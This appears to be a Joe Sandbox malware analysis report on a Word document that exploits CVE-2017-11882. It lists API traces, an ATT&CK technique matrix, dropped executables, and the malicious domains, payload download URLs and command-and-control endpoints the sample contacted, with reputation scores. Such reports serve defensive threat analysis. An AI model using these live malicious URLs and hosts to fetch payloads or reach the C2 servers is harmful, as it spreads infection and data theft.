Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_01331204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	5_2_01331204
Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe	Code function: 5_2_01331806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	5_2_01331806
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E130B9 sqlite3_bind_parameter_index,	8_2_61E130B9
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E032EE sqlite3_bind_parameter_name,	8_2_61E032EE
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E032DC sqlite3_bind_parameter_count,	8_2_61E032DC
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E1670D sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,	8_2_61E1670D
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E16929 sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,	8_2_61E16929
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E29BBD sqlite3_bind_double,sqlite3_mutex_leave,	8_2_61E29BBD
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E29B96 sqlite3_bind_text16,	8_2_61E29B96
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E29B29 sqlite3_bind_text64,	8_2_61E29B29
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E29B02 sqlite3_bind_text,	8_2_61E29B02
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E29ABB sqlite3_bind_blob64,	8_2_61E29ABB
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E29A94 sqlite3_mutex_leave,sqlite3_bind_blob,	8_2_61E29A94
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E29DB2 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,	8_2_61E29DB2
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E29D45 sqlite3_bind_zeroblob,sqlite3_mutex_leave,	8_2_61E29D45
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E29CC8 sqlite3_bind_pointer,sqlite3_mutex_leave,	8_2_61E29CC8
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E29C97 sqlite3_bind_null,sqlite3_mutex_leave,	8_2_61E29C97
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E29C71 sqlite3_bind_int,sqlite3_bind_int64,	8_2_61E29C71
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E29C22 sqlite3_bind_int64,sqlite3_mutex_leave,	8_2_61E29C22
Source: C:\Windows\SysWOW64\finger.exe	Code function: 8_2_61E29E99 sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,	8_2_61E29E99

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Shared Modules	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Browser Session Hijacking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	33 Exploitation for Client Execution	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	28 System Information Discovery	Distributed Component Object Model	1 Email Collection	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 Install Root Certificate	LSA Secrets	1 Query Registry	SSH	21 Input Capture	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	14 Security Software Discovery	VNC	3 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	12 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Modify Registry	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Virtualization/Sandbox Evasion	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	1 Remote System Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	412 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Arrival Notice.doc	42%	Virustotal		Browse
Arrival Notice.doc	42%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\fredchungel99962.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\BE[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\sqlite3.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
agoraeubebo.com	0%	Virustotal	Browse
www.gudvain.top	0%	Virustotal	Browse
www.deniztemiz.fun	3%	Virustotal	Browse
www.rtp7winbet.one	0%	Virustotal	Browse
domprojekt.pro	0%	Virustotal	Browse
xiaoyue.zhuangkou.com	0%	Virustotal	Browse
www.5597043.com	0%	Virustotal	Browse
covid19help.top	25%	Virustotal	Browse
www.quirkyquotients.online	2%	Virustotal	Browse
www.nimaster.com	1%	Virustotal	Browse
zopter.dev	0%	Virustotal	Browse
www.hggg2qyws.sbs	1%	Virustotal	Browse
www.thechurchinkaty.com	3%	Virustotal	Browse
www.agoraeubebo.com	0%	Virustotal	Browse
www.zopter.dev	1%	Virustotal	Browse
www.domprojekt.pro	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.quirkyquotients.online/nrup/?pX6dR=rSdoiViGYDYLrRKaPz3Wl2E0H4idUSMrBzK7mFXa25NHqewciJOPoSpxRDHHO+kRgCzM5kcGIwbMEKXffgYhKvnBPUmrqnWMxjfJBNBOhOMg9F9SVSa9oh3nojFO&tv=6TdD8B	0%	Avira URL Cloud	safe
https://covid19help.top/BE.exeggC:	100%	Avira URL Cloud	malware
https://covid19help.top/Ha	100%	Avira URL Cloud	malware
http://www.thechurchinkaty.com/nrup/?pX6dR=a+HLDFsiIkHuV4rg9hSpoeAycD7cgouMO9xbFOtVeNEzn7JMPDdWHI+uhZWQfHs/Ujvr+dR2RkWjKutxCrTuIvieTAa4VE7MqIx0HySFP6zbT2TnTvQ9seTn5ysI&tv=6TdD8B	0%	Avira URL Cloud	safe
http://www.297tamatest1kb.com/nrup/	0%	Avira URL Cloud	safe
http://www.5597043.com/nrup/?pX6dR=2at1c1MHk4LdsVUDX6VNCfiZAhfBXFznTyG93G2uP4ilKgyCyFz2SOnlOoLDNVe+GAWkq5GLoOyug5V+2NERvjVgTNNC5euwUf40sv0MPI9wPMaUWVPIc3sG3prc&tv=6TdD8B	100%	Avira URL Cloud	malware
http://www.hggg2qyws.sbs/nrup/?pX6dR=cxIeN1iVhQqOwsowpzRnZtCznzKsqLvfdqpS9UswCbkbA/58Vi1sucBg6AEQyfE3zCqKK/TeeNcUyXGKguuzOA8pGaYO9UjuKGEJ7C/XCVyDdYvyJ7HtIExhgCVf&tv=6TdD8B	100%	Avira URL Cloud	malware
https://covid19help.top/BE.exee	100%	Avira URL Cloud	malware
https://covid19help.top/BE.exej	100%	Avira URL Cloud	malware
http://www.agoraeubebo.com/nrup/	0%	Avira URL Cloud	safe
http://www.gudvain.top/nrup/?pX6dR=SizHnN/9xgcqSIkR3Mp/mJItKwrd9Ch/0t0LsappuxDuweYFtCvxWsRrJ8CRzXcbZvFBcd4a+abpRcpo9JYs/p363666BVY+tJEOkjWCxOG41ow7FQErnKiMZNMn&tv=6TdD8B	0%	Avira URL Cloud	safe
http://www.deniztemiz.fun/nrup/	0%	Avira URL Cloud	safe
https://covid19help.top/t	100%	Avira URL Cloud	malware
http://nginx.net/	0%	Avira URL Cloud	safe
http://www.gudvain.top/nrup/	0%	Avira URL Cloud	safe
http://www.agoraeubebo.com/nrup/?pX6dR=dWrD1PFadq7V5KkT4K5o1ooaeKyTUtdu4bG3e9Abb7XIEj/TR5WiVjbbrLaqi43PNcTkySoUuB0roTUDMpHLiI93yD7r6mO3qGIKC7GmJs3jJHvYZTDYbK7MHXTd&tv=6TdD8B	0%	Avira URL Cloud	safe
http://www.297tamatest1kb.com/nrup/	1%	Virustotal		Browse
http://www.deniztemiz.fun/nrup/	3%	Virustotal		Browse
http://www.297tamatest1kb.com/nrup/?pX6dR=aN7x9cBVxwix9wZx7W63qGecWvzsMiI/orbHVM7uweNeZbe3aghpRaSsJCdVU54yexiCzw7M43tjxUe+olQadlEjapDpq3RKvSvMx1ELA/lUdJRJgrfKn72amtTp&tv=6TdD8B	0%	Avira URL Cloud	safe
http://www.searchvity.com/?dn=	0%	Avira URL Cloud	safe
http://www.agoraeubebo.com/nrup/	0%	Virustotal		Browse
http://www.zopter.dev/nrup/	0%	Avira URL Cloud	safe
http://www.quirkyquotients.online/nrup/	0%	Avira URL Cloud	safe
http://www.hggg2qyws.sbs/nrup/	100%	Avira URL Cloud	malware
http://www.searchvity.com/?dn=	3%	Virustotal		Browse
http://nginx.net/	0%	Virustotal		Browse
http://www.nimaster.com/nrup/	0%	Avira URL Cloud	safe
http://www.nimaster.com/nrup/?pX6dR=QRCJemSun6KfUPjb2qqlqGicxCzmZViyr2LzNdaeeYxuOQk1p7mHourK8lVarsbBIBvr9aHYFlgCj6kd/MlaSQeL42icjeH9s29nuCeOpLeM+yzNa72Kcg7xsQaX&tv=6TdD8B	0%	Avira URL Cloud	safe
http://www.zopter.dev/nrup/	1%	Virustotal		Browse
http://www.hggg2qyws.sbs/nrup/	1%	Virustotal		Browse
http://www.zopter.dev/nrup/?pX6dR=i3HAzC/U9OJxIpd/aE0q2q4opSPsJIGS67PrGCHTQB0skmoYQlANVfiIbPI4IH/9kWpHr7erIPqYDzNgqjstw7965i84C6yRej7jTb0tuQprc2OKqp4FpQOaHFX3&tv=6TdD8B	0%	Avira URL Cloud	safe
http://www.northeastcol0r.com/sk-logabpstatus.php?a=dUZzc3lpUllpUk5kaWtzQW1IYjlWcnkvMTR6NmV1Y24rZ0Zx	0%	Avira URL Cloud	safe
http://www.northeastcol0r.com/nrup/	0%	Avira URL Cloud	safe
http://www.northeastcol0r.com/px.js?ch=2	0%	Avira URL Cloud	safe
http://www.gudvain.top/nrup/	2%	Virustotal		Browse
http://www.5597043.com/nrup/	100%	Avira URL Cloud	malware
http://www.northeastcol0r.com/px.js?ch=1	0%	Avira URL Cloud	safe
http://www.rtp7winbet.one	0%	Avira URL Cloud	safe
http://www.rtp7winbet.one/nrup/	0%	Avira URL Cloud	safe
https://covid19help.top/BE.exe	100%	Avira URL Cloud	malware
http://www.searchvity.com/	0%	Avira URL Cloud	safe
https://covid19help.top/BE.exeC:	100%	Avira URL Cloud	malware
http://www.domprojekt.pro/nrup/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
agoraeubebo.com	162.240.81.18	true	true	0%, Virustotal, Browse	unknown
www.gudvain.top	203.161.62.199	true	true	0%, Virustotal, Browse	unknown
www.deniztemiz.fun	46.28.105.2	true	true	3%, Virustotal, Browse	unknown
parkingpage.namecheap.com	91.195.240.19	true	false		high
www.rtp7winbet.one	172.67.145.66	true	true	0%, Virustotal, Browse	unknown
domprojekt.pro	46.242.239.47	true	true	0%, Virustotal, Browse	unknown
xiaoyue.zhuangkou.com	47.238.226.135	true	true	0%, Virustotal, Browse	unknown
www.5597043.com	91.195.240.94	true	true	0%, Virustotal, Browse	unknown
www.nimaster.com	217.26.48.101	true	true	1%, Virustotal, Browse	unknown
zopter.dev	192.185.225.30	true	true	0%, Virustotal, Browse	unknown
covid19help.top	172.67.175.222	true	true	25%, Virustotal, Browse	unknown
www.quirkyquotients.online	66.96.162.142	true	true	2%, Virustotal, Browse	unknown
www.northeastcol0r.com	208.91.197.27	true	true		unknown
www.297tamatest1kb.com	162.255.119.150	true	true		unknown
www.sqlite.org	45.33.6.223	true	false		high
www.zopter.dev	unknown	unknown	false	1%, Virustotal, Browse	unknown
www.domprojekt.pro	unknown	unknown	false	0%, Virustotal, Browse	unknown
www.thechurchinkaty.com	unknown	unknown	false	3%, Virustotal, Browse	unknown
www.hggg2qyws.sbs	unknown	unknown	false	1%, Virustotal, Browse	unknown
www.agoraeubebo.com	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.quirkyquotients.online/nrup/?pX6dR=rSdoiViGYDYLrRKaPz3Wl2E0H4idUSMrBzK7mFXa25NHqewciJOPoSpxRDHHO+kRgCzM5kcGIwbMEKXffgYhKvnBPUmrqnWMxjfJBNBOhOMg9F9SVSa9oh3nojFO&tv=6TdD8B	true	Avira URL Cloud: safe	unknown
http://www.297tamatest1kb.com/nrup/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.thechurchinkaty.com/nrup/?pX6dR=a+HLDFsiIkHuV4rg9hSpoeAycD7cgouMO9xbFOtVeNEzn7JMPDdWHI+uhZWQfHs/Ujvr+dR2RkWjKutxCrTuIvieTAa4VE7MqIx0HySFP6zbT2TnTvQ9seTn5ysI&tv=6TdD8B	true	Avira URL Cloud: safe	unknown
http://www.5597043.com/nrup/?pX6dR=2at1c1MHk4LdsVUDX6VNCfiZAhfBXFznTyG93G2uP4ilKgyCyFz2SOnlOoLDNVe+GAWkq5GLoOyug5V+2NERvjVgTNNC5euwUf40sv0MPI9wPMaUWVPIc3sG3prc&tv=6TdD8B	true	Avira URL Cloud: malware	unknown
http://www.hggg2qyws.sbs/nrup/?pX6dR=cxIeN1iVhQqOwsowpzRnZtCznzKsqLvfdqpS9UswCbkbA/58Vi1sucBg6AEQyfE3zCqKK/TeeNcUyXGKguuzOA8pGaYO9UjuKGEJ7C/XCVyDdYvyJ7HtIExhgCVf&tv=6TdD8B	true	Avira URL Cloud: malware	unknown
http://www.sqlite.org/2018/sqlite-dll-win32-x86-3240000.zip	false		high
http://www.agoraeubebo.com/nrup/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.gudvain.top/nrup/?pX6dR=SizHnN/9xgcqSIkR3Mp/mJItKwrd9Ch/0t0LsappuxDuweYFtCvxWsRrJ8CRzXcbZvFBcd4a+abpRcpo9JYs/p363666BVY+tJEOkjWCxOG41ow7FQErnKiMZNMn&tv=6TdD8B	true	Avira URL Cloud: safe	unknown
http://www.deniztemiz.fun/nrup/	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.gudvain.top/nrup/	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.agoraeubebo.com/nrup/?pX6dR=dWrD1PFadq7V5KkT4K5o1ooaeKyTUtdu4bG3e9Abb7XIEj/TR5WiVjbbrLaqi43PNcTkySoUuB0roTUDMpHLiI93yD7r6mO3qGIKC7GmJs3jJHvYZTDYbK7MHXTd&tv=6TdD8B	true	Avira URL Cloud: safe	unknown
http://www.297tamatest1kb.com/nrup/?pX6dR=aN7x9cBVxwix9wZx7W63qGecWvzsMiI/orbHVM7uweNeZbe3aghpRaSsJCdVU54yexiCzw7M43tjxUe+olQadlEjapDpq3RKvSvMx1ELA/lUdJRJgrfKn72amtTp&tv=6TdD8B	true	Avira URL Cloud: safe	unknown
http://www.zopter.dev/nrup/	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.quirkyquotients.online/nrup/	true	Avira URL Cloud: safe	unknown
http://www.hggg2qyws.sbs/nrup/	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.nimaster.com/nrup/	true	Avira URL Cloud: safe	unknown
http://www.nimaster.com/nrup/?pX6dR=QRCJemSun6KfUPjb2qqlqGicxCzmZViyr2LzNdaeeYxuOQk1p7mHourK8lVarsbBIBvr9aHYFlgCj6kd/MlaSQeL42icjeH9s29nuCeOpLeM+yzNa72Kcg7xsQaX&tv=6TdD8B	true	Avira URL Cloud: safe	unknown
http://www.zopter.dev/nrup/?pX6dR=i3HAzC/U9OJxIpd/aE0q2q4opSPsJIGS67PrGCHTQB0skmoYQlANVfiIbPI4IH/9kWpHr7erIPqYDzNgqjstw7965i84C6yRej7jTb0tuQprc2OKqp4FpQOaHFX3&tv=6TdD8B	true	Avira URL Cloud: safe	unknown
http://www.northeastcol0r.com/nrup/	true	Avira URL Cloud: safe	unknown
http://www.5597043.com/nrup/	true	Avira URL Cloud: malware	unknown
http://www.rtp7winbet.one/nrup/	true	Avira URL Cloud: safe	unknown
https://covid19help.top/BE.exe	true	Avira URL Cloud: malware	unknown
http://www.domprojekt.pro/nrup/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://covid19help.top/BE.exeggC:	EQNEDT32.EXE, 00000002.00000002.345073188.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://covid19help.top/Ha	EQNEDT32.EXE, 00000002.00000002.345073188.000000000061C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	false		high
http://297-tamaki-drive-auckland-au-1071-sales.properties.sothebysrealty.com	CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.00000000034B8000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	false		high
https://covid19help.top/BE.exee	EQNEDT32.EXE, 00000002.00000002.345073188.00000000005E4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://covid19help.top/BE.exej	EQNEDT32.EXE, 00000002.00000002.345073188.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ocsp.entrust.net03	EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com0	finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://covid19help.top/t	EQNEDT32.EXE, 00000002.00000002.345073188.000000000061C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nginx.net/	finger.exe, 00000008.00000002.841615616.0000000003914000.00000004.10000000.00040000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.0000000003E24000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://fedoraproject.org/	finger.exe, 00000008.00000002.841615616.0000000003914000.00000004.10000000.00040000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.0000000003E24000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.searchvity.com/?dn=	finger.exe, 00000008.00000002.841615616.000000000313A000.00000004.10000000.00040000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.000000000364A000.00000004.00000001.00040000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sqlite.org/copyright.html.	finger.exe, 00000008.00000002.842461764.0000000061EA8000.00000008.00000001.01000000.00000008.sdmp, sqlite3.dll.8.dr	false		high
https://crash-reports.mozilla.com/submit?id=	firefox.exe, 0000000E.00000002.457692397.0000000000F20000.00000040.80000000.00040000.00000000.sdmp	false		high
http://crl.entrust.net/server1.crl0	EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.thawte.com0	finger.exe, 00000008.00000003.438784233.0000000005D5C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	false		high
http://www.northeastcol0r.com/sk-logabpstatus.php?a=dUZzc3lpUllpUk5kaWtzQW1IYjlWcnkvMTR6NmV1Y24rZ0Zx	finger.exe, 00000008.00000002.841615616.0000000003DCA000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.841987796.0000000005090000.00000004.00000800.00020000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.00000000042DA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/favicon.ico	-e04230_.8.dr	false		high
http://www.northeastcol0r.com/px.js?ch=2	finger.exe, 00000008.00000002.841615616.0000000003DCA000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.841987796.0000000005090000.00000004.00000800.00020000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.00000000042DA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.northeastcol0r.com/px.js?ch=1	finger.exe, 00000008.00000002.841615616.0000000003DCA000.00000004.10000000.00040000.00000000.sdmp, finger.exe, 00000008.00000002.841987796.0000000005090000.00000004.00000800.00020000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.00000000042DA000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rtp7winbet.one	CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841509438.00000000005B3000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.searchvity.com/	finger.exe, 00000008.00000002.841615616.000000000313A000.00000004.10000000.00040000.00000000.sdmp, CDWVOahfvgiDRJzfAMolQRnDPlOohi.exe, 0000000A.00000002.841981166.000000000364A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://covid19help.top/BE.exeC:	EQNEDT32.EXE, 00000002.00000002.345073188.0000000000630000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://secure.comodo.com/CPS0	EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	false		high
http://crl.entrust.net/2048ca.crl0	EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	finger.exe, 00000008.00000003.438445982.0000000005D6D000.00000004.00000020.00020000.00000000.sdmp, -e04230_.8.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
192.185.225.30	zopter.dev	United States	46606	UNIFIEDLAYER-AS-1US	true
162.240.81.18	agoraeubebo.com	United States	46606	UNIFIEDLAYER-AS-1US	true
45.33.6.223	www.sqlite.org	United States	63949	LINODE-APLinodeLLCUS	false
91.195.240.94	www.5597043.com	Germany	47846	SEDO-ASDE	true
46.242.239.47	domprojekt.pro	Poland	12824	HOMEPL-ASPL	true
46.28.105.2	www.deniztemiz.fun	Czech Republic	197019	WEDOSCZ	true
162.255.119.150	www.297tamatest1kb.com	United States	22612	NAMECHEAP-NETUS	true
208.91.197.27	www.northeastcol0r.com	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
66.96.162.142	www.quirkyquotients.online	United States	29873	BIZLAND-SDUS	true
203.161.62.199	www.gudvain.top	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
47.238.226.135	xiaoyue.zhuangkou.com	United States	20115	CHARTER-20115US	true
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
172.67.175.222	covid19help.top	United States	13335	CLOUDFLARENETUS	true
217.26.48.101	www.nimaster.com	Switzerland	29097	HOSTPOINT-ASCH	true
172.67.145.66	www.rtp7winbet.one	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1435895
Start date and time:	2024-05-03 11:31:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Arrival Notice.doc
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@11/19@16/15
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 94% Number of executed functions: 63 Number of non-executed functions: 295
